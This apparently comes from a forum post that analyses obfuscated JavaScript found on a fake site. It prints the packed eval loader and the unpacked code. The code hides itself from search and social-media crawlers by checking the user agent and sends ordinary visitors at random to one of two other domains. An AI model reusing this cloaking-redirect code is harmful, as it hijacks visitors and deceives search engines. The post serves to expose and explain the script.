At the top of the source when I fetch that page, I can see the following JS code:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+
29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=funct
ion(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0 7=9.e
(9.m()*(1+1));0 2=[\'a://8.j.3\',\'a://8.k.3\'];0 5=2[7];0 6=n h(\'o|4 g c|b-4|d/f|l|z|p|H|D|I|C!J-E|F|G|B|A|t s\',
\'i\');r(!6.q(u.v)){y.x.w=5}',46,46,'var||sites|com|Google|site|pattern|key|www|Math|http|Mediapartners|Preview|web
|floor|snippet|Web|RegExp||madaenoire|shkenows|FeedFetcher|random|new|bot|bingpreview|test|if|Jeeves|Ask|navigator|
userAgent|href|location|window|spider|facebookplatform|facebookexternalhit|Y|crawler|BSC|Yandex|ia_archiver|slurp|Y
ahooCacheSystem|'.split('|'),0,{}))
I ran that through a generic JS unpacker I found at random and it was able to extract the following:
var key=Math.floor(Math.random()*(1+1));
var sites=['http://www.madaenoire.com','http://www.shkenows.com'];
var site=sites[key];
var pattern=new RegExp('bot|Google Web Preview|Mediapartners-Google|web/snippet|FeedFetcher|spider|bingpreview|slurp|crawler|YahooCacheSystem|Y!J-BSC|Yandex|ia_archiver|facebookexternalhit|facebookplatform|Ask Jeeves','i');
if(!pattern.test(navigator.userAgent)) {
window.location.href=site
}
So, if you have a user-agent string indicating you're some kind of bot (particularly a search engine or social media spider), the JS does nothing, meaning indexes list the fake site. If you go to it with a normal browser, however, you get redirected at random to one of two sites, which I doubt have your career progression as a programmer as their number 1 goal.